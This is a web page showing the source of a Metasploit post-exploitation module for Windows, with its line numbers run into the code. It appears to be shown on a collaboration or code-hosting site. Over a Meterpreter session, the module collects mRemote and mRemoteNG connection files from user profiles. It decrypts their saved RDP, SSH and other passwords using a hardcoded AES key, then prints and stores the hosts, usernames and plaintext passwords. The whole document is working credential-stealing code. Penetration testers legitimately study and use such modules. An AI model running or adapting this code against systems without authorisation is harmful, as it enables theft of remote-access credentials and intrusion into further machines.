Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/windows/gather/credentials/mremote.rb
Views: 11704
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'rexml/document'67class MetasploitModule < Msf::Post8include Msf::Post::File9include Msf::Post::Windows::UserProfiles10include Msf::Auxiliary::Report1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Windows Gather mRemote Saved Password Extraction',17'Description' => %q{18This module extracts saved passwords from mRemote. mRemote stores19connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves20the passwords in an encrypted format. The module will extract the connection21info and decrypt the saved passwords.22},23'License' => MSF_LICENSE,24'Author' => [25'theLightCosine',26'hdm', # Helped write the Decryption Routine27'mubix' # Helped write the Decryption Routine28],29'Platform' => [ 'win' ],30'SessionTypes' => [ 'meterpreter' ]31)32)33end3435def run36@secret = "\xc8\xa3\x9d\xe2\xa5\x47\x66\xa0\xda\x87\x5f\x79\xaa\xf1\xaa\x8c"3738grab_user_profiles.each do |user|39next if user['LocalAppData'].nil?4041tmpath = user['LocalAppData'] + '\\Felix_Deimel\\mRemote\\confCons.xml'42ng_path = user['AppData'] + '\\mRemoteNG\\confCons.xml'43get_xml(tmpath)44get_xml(ng_path)45end46end4748def get_xml(path)49print_status("Looking for #{path}")50begin51if file_exist?(path)52condata = read_file(path)53loot_path = store_loot('mremote.creds', 'text/xml', session, condata, path)54vprint_good("confCons.xml saved to #{loot_path}")55parse_xml(condata)56print_status("Finished processing #{path}")57end58rescue Rex::Post::Meterpreter::RequestError59print_status("The file #{path} either could not be read or does not exist")60return61end62end6364def parse_xml(data)65mxml = REXML::Document.new(data).root66mxml.elements.to_a('//Node').each do |node|67host = node.attributes['Hostname']68port = node.attributes['Port']69proto = node.attributes['Protocol']70user = node.attributes['Username']71domain = node.attributes['Domain']72epassword = node.attributes['Password']73next if epassword.nil? || epassword == ''7475decoded = epassword.unpack('m*')[0]76iv = decoded.slice!(0, 16)77pass = decrypt(decoded, @secret, iv, 'AES-128-CBC')78print_good("HOST: #{host} PORT: #{port} PROTOCOL: #{proto} Domain: #{domain} USER: #{user} PASS: #{pass}")7980service_data = {81address: host,82port: port,83service_name: proto,84protocol: 'tcp',85workspace_id: myworkspace_id86}8788credential_data = {89origin_type: :session,90session_id: session_db_id,91post_reference_name: refname,92private_type: :password,93private_data: pass,94username: user95}9697if domain.present?98credential_data[:realm_key] = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN99credential_data[:realm_value] = domain100end101102credential_data.merge!(service_data)103104# Create the Metasploit::Credential::Core object105credential_core = create_credential(credential_data)106107# Assemble the options hash for creating the Metasploit::Credential::Login object108login_data = {109core: credential_core,110status: Metasploit::Model::Login::Status::UNTRIED111}112113# Merge in the service data and create our Login114login_data.merge!(service_data)115create_credential_login(login_data)116end117end118119def decrypt(encrypted_data, key, iv, cipher_type)120aes = OpenSSL::Cipher.new(cipher_type)121aes.decrypt122aes.key = key123aes.iv = iv if !iv.nil?124aes.update(encrypted_data) + aes.final125end126end127128129